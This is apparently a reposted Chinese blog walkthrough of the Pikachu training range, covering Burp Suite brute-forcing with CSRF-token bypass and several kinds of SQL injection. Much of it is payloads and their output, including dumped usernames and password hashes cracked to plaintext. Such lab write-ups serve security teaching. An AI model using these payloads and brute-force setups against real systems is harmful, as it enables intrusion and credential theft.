pikachu靶场

这篇具有很好参考价值的文章主要介绍了pikachu靶场。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

pikachu靶场

基于表单暴力破解

看一下界面,有两个输入框,使用暴力破解使用Cluster bomb
前提须知是
Sinper 对$$符号标记的数据进行逐个替换
Battering ram 对$$符号标记的数据同时替换
Pitchfork 多参数,使用不同字典
Cluster bomb 多参数做笛卡尔乘积模式爆破,多个位置,交叉组合

pikachu靶场

bp抓包,发送到intrude,修改标记内容

pikachu靶场

设置payloads,set 1 2 type设置为simple load字典 进行 start attack, 将length大小排序就出来了

pikachu靶场

pikachu靶场

验证码绕过(on server)

比上面多了一个验证码,用bp抓包看下

pikachu靶场

pikachu靶场

尝试了几次账号密码都没提示验证码的问题,说明验证码可以一直用,那就和上面思路一样暴力破解

pikachu靶场

验证码绕过(on client)

尝试输入,发现会有弹窗,那就是前端,查看前端关于验证码的代码,createCode()

pikachu靶场

老样子的配置进行,依旧成功,前端验证bp都能无视

pikachu靶场

token防爆破

一看没有验证码了,token搜索下含义,令牌,验证,防止csrf攻击,

pikachu靶场

尝试下bp显示csrf token error,每次token都会变

pikachu靶场

再尝试删除token,response中什么返回结果都没有,发现前端代码hidden,token,value的代码尝试是下一次的token

pikachu靶场

攻击模式选择Pitchfork,因为Cluster bomb是三组payload排列组合,所以使用一对一的
第三个payload type设置为Recursive grep

pikachu靶场

先在这个界面选择打勾然后add
双击下图value的内容就自动填写正则表达式了

pikachu靶场

pikachu靶场

还需要将线程设置为1,因为每次都要用上次response中返回的token,多线程就会乱

pikachu靶场

最后一步开跑就结束了

pikachu靶场

数字型注入

看一下源码,没有任何处理,那直接bp抓包修改

pikachu靶场

id=1 order by 2#&submit=%E6%9F%A5%E8%AF%A2
发现order by 3 报错,order by2 正常,字段数就是2

pikachu靶场

正常走流程爆库
id=1 union select 1,database()#
pikachu

pikachu靶场

爆表
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
 httpinfo,member,message,users,xssblind

pikachu靶场

爆字段
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()#
id,userid,ipaddress,useragent,httpaccept,remoteport,id,username,pw,sex,phonenum,address,email,id,content,time,id,username,password,level,id,time,content,name

pikachu靶场

下面就是字段里的数据了
1 union select username,password from users#
e10adc3949ba59abbe56e057f20f883e
670b14728ad9902aecba32e22fa4f6bd
e99a18c428cb38d5f260853678922e03
像是md5解码,md5在线解密下
123456
000000
abc123

pikachu靶场

字符型注入

看一下源码,需要考虑闭合是单引号

pikachu靶场

输入万能注入,有变化证明语句正确
1' or 1=1#

pikachu靶场

判断字段数,道理同数字型注入
1' order by 2#

pikachu靶场

爆库
1' union select 1,database()#
pikachu

pikachu靶场

爆表
1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind

pikachu靶场

爆字段
1' union select group_concat(column_name),2 from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password 

pikachu靶场

爆值
1' union select username,password from users#
your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e
your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd
your uid:test
your email is: e99a18c428cb38d5f260853678922e03
同理用md5解密

XX型注入

查看源码,单引号和括号

pikachu靶场

尝试一下
1') or 1=1#
成功了,按照流程继续

pikachu靶场

爆库
1') union select 1,database()#
pikachu

pikachu靶场

爆表
1') union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind

pikachu靶场

爆字段
1') union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password

pikachu靶场

爆值
1') union select username,password from users#
your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e

your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd

your uid:test
your email is: e99a18c428cb38d5f260853678922e03

搜索型注入

查看源码,单引号和百分号

pikachu靶场

1%' or 1=1#
成功了,那还是老流程

pikachu靶场

判断字段数,这个是到4才显示错误
1%' order by 4#
字段数就是3了

pikachu靶场

爆库
1%' union select 1,2,database()#
pikachu

pikachu靶场

爆表
1%' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind

pikachu靶场

爆字段
1%' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password

pikachu靶场

爆值
1%' union select username,password,3 from users#
username:admin
uid:e10adc3949ba59abbe56e057f20f883e
email is: 3

username:pikachu
uid:670b14728ad9902aecba32e22fa4f6bd
email is: 3

username:test
uid:e99a18c428cb38d5f260853678922e03
email is: 3

pikachu靶场

"insert/update"注入

查看源码,会对字符进行转义,联合注入就不能用了,进行报错注入

pikachu靶场

bp在注册界面抓包,爆库
1' or updatexml(1,concat(0x7e,database()),1) or'

pikachu靶场

爆表
1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) or'

pikachu靶场

爆字段
1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) or'

pikachu靶场

爆值
1' or updatexml(1,concat(0x7e,(select group_concat(username,'@',password)from pikachu.users)),1) or'

pikachu靶场

"delete"注入

查看源代码,

pikachu靶场

File inclusion(local)

先查看源码,无限制,

pikachu靶场文章来源地址https://www.toymoban.com/news/detail-799276.html

到了这里,关于pikachu靶场的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • dvwa靶场Brute Force(暴力破解)全难度教程(附代码分析)

    建议使用owaspbwa靶场可以不用搭建dvwa以及其他常用靶场,省去搭建靶场的困扰,但是此靶机靶场较老,并不建议使用 owaspbwa下载地址: OWASP Broken Web Applications Project download | SourceForge.net 注:owaspbwa的本机用户名root密码owaspbwa,记得看看靶机的ip方便以后使用。dvwa的用户名和密

    2024年02月09日
    浏览(48)
  • 一次真实的应急响应案例(Windows2008)——暴力破解、留隐藏账户后门与shift粘贴键后门、植入WaKuang程序——事件复现(含靶场环境)

    某天客户反馈:服务器疑似被入侵,风扇噪声很大。( 真实案例自己搭建环境复现一下,靶场环境放在了 知识星球 和 我的资源 中 ) 受害服务器: Windows2008 系统、 IP: 192.168.226.137、无WEB服务 根据客户反馈:“风扇噪声很大”,一般只有消耗CPU很多的情况下,服务器高温,

    2024年02月03日
    浏览(67)
  • 靶场搭建——搭建pikachu靶场

    这里我所运用到的材料有:首先我最终是在虚拟机中环境为 win2012 和主机都搭建完成。 (一个即可) Phpstudy,Phpstorm,pikachu、 外加的话浏览器别太老。 Phpstudy :https://www.xp.cn/ Phpstorm :https://www.jetbrains.com/zh-cn/phpstorm/ pikachu :https://github.com/zhuifengshaonianhanlu/pikachu 这里我并没有

    2024年02月12日
    浏览(46)
  • 口令暴力破解--Telnet协议暴力破解、数据库暴力破解与远程桌面暴力破解

    Telnet        Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。要开始一个telnet会话,必须输入用户名和密码来登录服务器。而一般服务器不会对用户名和密码的登录尝试做限制,因此

    2023年04月19日
    浏览(62)
  • 搭建一个pikachu靶场

    今天我们来学习搭建一个pikachu的web靶场 首先我们来下载源代码 开源源代码链接:https://github.com/zhuifengshaonianhanlu/pikachu  然后我们来 搭建靶场 我这里使用小皮面板进行快速搭建,它是一个较为快捷的部署工具。 小皮面板官网:小皮面板(phpstudy) - 让天下没有难配的服务器环境

    2024年01月25日
    浏览(41)
  • pikachu靶场搭建教程

    pikachu靶场下载地址:https://github.com/zhuifengshaonianhanlu/pikachu 搭建过程 将靶场文件夹放到phpstudy的www目录 进入pikach文件夹的inc目录,修改靶场配置文件 config.inc.php ,设置数据库账号密码均为 root 启动phpstudy后访问本机ip目录下的install.php文件,进行安装初始化 点击安装/初始化 初

    2024年01月18日
    浏览(44)
  • Pikachu靶场练习——CSRF

    打开pikachu靶场的CSRF我们可以看到CSRF的练习共有三项,分别为get、post、CSRF Token,在概述的地方有对CSRF的简单描述和一个小场景,对CSRF不熟悉的话建议先看看,看完之后那就开始趴。 点击CSRF(get)我们可以看到一个登录页面,点一下提示我们能够得到用户的登陆密码(后面

    2023年04月08日
    浏览(46)
  • pikachu靶场-RCE

    RCE漏洞概述 可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 命令执行漏洞(Command Execution)即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限 更常见的命令执行漏洞是发生在各种Web组件,

    2024年02月01日
    浏览(43)
  • pikachu 靶场通关(全)

    1.1.1 漏洞利用 burp抓包,ctrl+i 添加爆破 根据返回长度得到两个用户 admin 123456 test abc123 文件路径在:vul/burteforce/bf_form.php 通过注释以及说明了,没有验证码也没有其他的访问控制,直接开始爆破就行 1.2.1 漏洞利用  比上面多了一个验证码,我们在提交时抓包,然后ctrl+r  重放

    2024年02月07日
    浏览(35)
  • pikachu靶场-敏感信息泄露

    敏感信息泄漏简述 攻击方式 常见的攻击方式主要是扫描应用程序获取到敏感数据 漏洞原因 应用维护或者开发人员无意间上传敏感数据,如 github 文件泄露 敏感数据文件的权限设置错误,如网站目录下的数据库备份文件泄露 网络协议、算法本身的弱点,如 telent、ftp、md5 等

    2024年02月09日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包